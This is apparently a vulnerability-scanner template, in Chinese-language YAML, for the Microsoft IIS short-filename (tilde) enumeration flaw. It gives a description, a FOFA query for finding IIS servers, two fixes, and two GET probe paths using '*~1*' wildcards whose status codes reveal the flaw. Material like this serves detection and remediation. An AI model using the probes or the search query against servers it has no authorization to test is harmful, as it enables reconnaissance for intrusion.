product: Microsoft-IIS
vName: Microsoft-IIS 短文件名枚举
type: 解析漏洞
vID: [ ]
level: 2
vDesc: Internet Information Services（IIS，互联网信息服务）是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。Microsoft IIS在实现上存在文件枚举漏洞，攻击者可利用此漏洞枚举网络服务器根目录中的文件。危害：攻击者可以利用“~”字符猜解或遍历服务器中的文件名，或对IIS服务器中的.Net Framework进行拒绝服务攻击。黑客可通过该漏洞尝试获取网站服务器下存放文件的文件名，达到获取更多信息来入侵服务器的目的。
version: ''
note: ''
search:
  FOFA: app="IIS"
protocol: http
link: https://www.birdy02.com/2024/10/02/8a0d92a9-68ef-47cf-b556-0e893063dac3
fix:
  - 关闭NTFS 8.3文件格式的支持。该功能默认是开启的，对于大多数用户来说无需开启。
  - 将web文件夹的内容拷贝到另一个位置，比如D:\www到D:\www.back，然后删除原文件夹D:\www，再重命名D:\www.back到D:\www。如果不重新复制，已经存在的短文件名则是不会消失的。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /ttt*~1*/a.aspx
    verify:
      path: ''
      logic: and
      check:
        - status: 400
  - exp:
      method: get
      follow: false
      path: /*~1*/a.aspx
    verify:
      path: ''
      logic: and
      check:
        - status: 404